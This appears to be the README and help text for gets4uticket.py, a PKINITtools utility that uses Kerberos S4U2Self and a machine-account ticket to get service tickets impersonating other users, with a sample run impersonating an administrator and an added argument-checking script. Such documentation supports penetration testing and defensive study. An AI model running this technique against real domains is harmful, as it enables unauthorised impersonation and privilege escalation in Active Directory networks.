gets4uticket.py - Gets an S4U2self ticket impersonating given user

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you’ve obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only kerberos_connection_url this tool accepts is one containing a ccache file, for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating. You can’t use this for delegation attacks: it does not implement S4U2Proxy, and there are plenty of tools already for that.

Installation

Install PKINITtools.

Usage

gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Flags

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
  spn                   the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a TGS ticket to be used for file access on server "fileserver". IMPORTANT:
                        SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

options:
  -h, --help            show this help message and exit
  -v, --verbose

==== Extra Help ====
   kerberos connection url secret types: 
   - Plaintext: "pw" or "pass" or "password"
   - NT hash: "nt"
   - RC4 key: "rc4"
   - AES128/256 key: "aes"
   - CCACHE file: "ccache"
   - SSPI: "sspi"
   
   Example:
   - Plaintext + SOCKS5 proxy:
      kerberos+password://domain\user:[email protected]/proxytype=socks5&proxyhost=127.0.0.1&proxyport=1080
   - Plaintext:
      kerberos+password://domain\user:[email protected]
      kerberos+pw://domain\user:[email protected]
      kerberos+pass://domain\user:[email protected]
   - NT hash:
      kerberos+nt://domain\user:[email protected]
   - SSPI:
      TEST/user/sspi:@192.168.1.1
   - RC4 key:
      kerberos+rc4://domain\user:[email protected]
   - AES key:
      kerberos+aes://domain\user:[email protected]
   - CCACHE file:
      kerberos+ccache://domain\user:[email protected]
   - KEYTAB file:
      kerberos+keytab://domain\user:[email protected]
   - PFX file:
      kerberos+pfx://TEST.corp\Administrator:[email protected]/?certdata=test.pfx
   - PFX string (b64):
      kerberos+pfxstr://TEST.corp\Administrator:[email protected]/?certdata=BASE64DATA
   - No auth (preauth not req):
      kerberos+none://TEST.corp\[email protected]/

Examples

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!
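
The argument rules stated above (a ccache-only connection URL, a machine-account TGT, and a hostname rather than an IP in the SPN) can be checked before the tool is run. The following Python check is an added example, not part of PKINITtools; check_args, is_ip and the sample values are hypothetical and constructed for illustration.

```python
import ipaddress
import re

# kerberos+<secret type>://domain\user:secret@<domaincontroller-ip>, per the help text
URL_RE = re.compile(r"^kerberos\+(?P<stype>[a-z0-9]+)://(?P<domain>[^\\/:@]+)"
                    r"\\(?P<user>[^:@]+):(?P<secret>[^@]+)@(?P<dc>[^/?]+)")
# <service>/<server-hostname>@<domain>, per the help text
SPN_RE = re.compile(r"^(?P<service>[^/@]+)/(?P<host>[^/@]+)@(?P<domain>[^/@]+)$")

# Constructed sample values (documentation-reserved names and addresses)
SAMPLE_URL = "kerberos+ccache://corp.example\\ws01$:machine.ccache@192.0.2.10"
SAMPLE_SPN = "cifs/ws01.corp.example@corp.example"


def is_ip(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def check_args(url, spn):
    """Hypothetical helper: list of problems, empty if both arguments fit the documented format."""
    problems = []
    u = URL_RE.match(url)
    if not u:
        problems.append("url: expected kerberos+ccache://domain\\user:file.ccache@<dc>")
    elif u["stype"] != "ccache":
        problems.append(f"url: secret type {u['stype']!r} not accepted, only 'ccache'")
    elif not u["user"].endswith("$"):
        # Assumption: AD machine account names end in '$'
        problems.append("url: user is not a machine account (no trailing '$')")
    s = SPN_RE.match(spn)
    if not s:
        problems.append("spn: expected <service>/<server-hostname>@<domain>")
    elif is_ip(s["host"]):
        problems.append("spn: host is an IP address, the server's hostname is required")
    return problems


if __name__ == "__main__":
    for issue in check_args(SAMPLE_URL, SAMPLE_SPN) or ["arguments look well-formed"]:
        print(issue)
```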